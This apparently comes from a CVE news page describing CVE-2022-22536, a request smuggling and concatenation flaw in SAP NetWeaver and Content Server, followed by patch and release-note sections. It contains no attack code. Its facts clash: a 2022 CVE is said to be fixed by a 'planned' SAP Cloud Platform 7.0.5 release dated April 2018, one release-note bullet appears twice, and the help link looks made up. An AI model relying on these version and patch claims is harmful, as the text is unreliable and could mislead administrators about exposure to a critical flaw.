CVE-2022-22536 SAP's NetWeaver Application Server ABAP, Java, and Content Server 7.53 are vulnerable to request smuggling and concatenation.

CVE-2022-22536 SAP's NetWeaver Application Server ABAP, Java, and Content Server 7.53 are vulnerable to request smuggling and concatenation.

ABAP, SAP NetWeaver Application Server Java and SAP Web Dispatcher are vulnerable for request smuggling and request concatenation. An unauthenticated attacker can prepend a victim's request with arbitrary data. This way, the attacker can execute functions impersonating the victim or poison intermediary Web caches. A successful attack could result in complete compromise of Confidentiality, Integrity and Availability of the system. SAP Content Server is vulnerable for directory traversal and request smuggling. An unauthenticated attacker can create a special link in the system's directory that can be used to inject arbitrary data into the system's requests. A successful attack could result in complete compromise of Confidentiality, Integrity and Availability of the system.
In addition to the vulnerabilities listed above, SAP Cloud Platform is vulnerable for directory traversal and request smuggling. An unauthenticated attacker can create a special link in the system's directory that can be used to inject arbitrary data into the system's requests. A successful attack could result in complete compromise of Confidentiality, Integrity and Availability of the system.
Planned release of SAP Cloud Platform 7.0.5 on April 24, 2018 addresses all of the above vulnerabilities.

Check if you are vulnerable

If you are running SAP Content Server, SAP NetWeaver Application Server Java and/or SAP Web Dispatcher on the platform where these vulnerabilities are found, please check for a patch.

What is the current state of SAP Cloud Platform?

SAP Cloud Platform 7.0.5 is scheduled to release on April 24th, 2018, and will fix all of the vulnerabilities listed above.

Security Risk Assessments and Risk Management

It is important to conduct security risk assessments, as well as implement controls and mitigation strategies. For example, if you have an application with a high risk of compromise, consider sandboxing your app into a separate environment that does not contain production data.

What’s new in the SAP Cloud Platform 7.0.5 release?

SAP Cloud Platform 7.0.5 includes the following new features and improvements:
- SAP Cloud Platform 7.0.5 is now available for all licensed users without a dependency on the SAP HANA Cloud Service or the SAP Base Services;
- The standard subscription term of a Full Support Subscription has been extended to 12 months from 9 months with the release of SAP Cloud Platform 7.0.5;
- Enhanced security question as well as two-factor authentication is now available for all hybrid cloud instances in order to protect against unauthorized access;
- In addition to read-only data sources, you can now also add writeable data sources in SAP Cloud Platform;
- The standard subscription term of a Full Support Subscription has been extended to 12 months from 9 months with the release of SAP Cloud Platform 7.0.5; and
- Additional information about the changes in this release can be found here http://helpcenter.sap.com/hc/en-us/articles/360000000002294---New_in_SAP_Cloud_Platform_7__5_.

References

Subscribe to CVE.news
Don’t miss out on the latest issues. Sign up now to get access to the library of members-only issues.
jamie@example.com
Subscribe